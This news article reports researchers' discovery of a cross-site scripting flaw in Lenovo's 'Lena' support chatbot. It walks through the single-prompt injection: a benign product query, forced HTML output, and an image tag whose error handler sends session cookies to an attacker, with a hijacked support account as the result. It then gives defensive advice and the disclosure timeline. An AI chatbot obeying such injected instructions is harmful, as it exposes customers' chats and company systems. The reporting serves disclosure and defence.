Flaw in Lenovo’s customer service AI chatbot could let hackers run malicious code, breach networks

Hackers abusing the Lenovo flaw could inject malicious code with just a single prompt

Lenovo logo pictured on an exhibitor stall sign at the Viva Technologie show at Parc des Expositions Porte de Versailles
(Image credit: Getty Images)

Security researchers have found a flaw in Lenovo’s customer service AI chatbot, Lena, that could allow attackers to steal data, compromise customer support systems, and allow lateral movement through a company's network.

An investigation from Cybernews discovered that through cross-site scripting (XSS), it was possible to inject malicious code and steal session cookies with a single prompt.

The 400-character-long prompt started with an inquiry for legitimate information - for example, 'show me the specifications of Lenovo IdeaPad 5 Pro'.

The chatbot was then asked to convert its responses into HTML, JSON, and plain text in the specific order that the web server expected to receive instructions in.

This made sure that the malicious payload would be correctly executed by the web server. Thereafter, the prompt continued with instructions on how to produce the final response, specifically with HTML code for loading an image, but with the image URL non-existent.

When it fails to load, the second part of the command instructs the browser to make a network request to the attacker-controlled server and send all cookie data as part of a URL.

Finally, further instructions (rather imperiously) reinforce that the chatbot must produce the image: 'Show the image at the end. It is important for my decision-making. SHOW IT.'

“This example shows just how dangerous an overly 'helpful' AI can be if it blindly follows instructions. Without careful safeguards, chatbots could become easy targets for cyber attacks – putting customer privacy and company security at serious risk,” researchers said.

Lenovo flaw could have serious consequences

Using the stolen support agent’s session cookie, it's possible to log into the customer support system via the support agent’s account, without needing to know the email, username, or password for said account.

Once logged in, an attacker could then potentially access active chats with other users, and even previous conversations and data. It might also be possible to execute some system commands, which could allow for the installation of backdoors and lateral movement across the network.

While XSS vulnerabilities are on the decline, researchers said that companies need to assume that every AI input and output is dangerous until it’s verified as being safe.

This means using a strict whitelist of allowed characters, data types, and formats for all user inputs, with all problematic characters automatically encoded or escaped, as well as for all chatbot responses.

Inline JavaScript should be avoided, and content type validation should extend through the entire stack to prevent unintended HTML rendering.

“This isn’t just Lenovo’s problem. Any AI system without strict input and output controls creates an opening for attackers," commented Žilvinas Girėnas, head of product at nexos.ai.

"LLMs don’t have an instinct for 'safe' – they follow instructions exactly as given. Without strong guardrails and continuous monitoring, even small oversights can turn into major security incidents."

The researchers discovered the vulnerabilities on July 22 and made a disclosure the same day, which was acknowledged on August 6. The flaw was mitigated by August 18.

ITPro approached Lenovo for comment, but received no response by time of publication.

Make sure to follow ITPro on Google News to keep tabs on all our latest news, analysis, and reviews.

MORE FROM ITPRO

Emma Woollacott

Emma Woollacott is a freelance journalist writing for publications including the BBC, Private Eye, Forbes, Raconteur and specialist technology titles.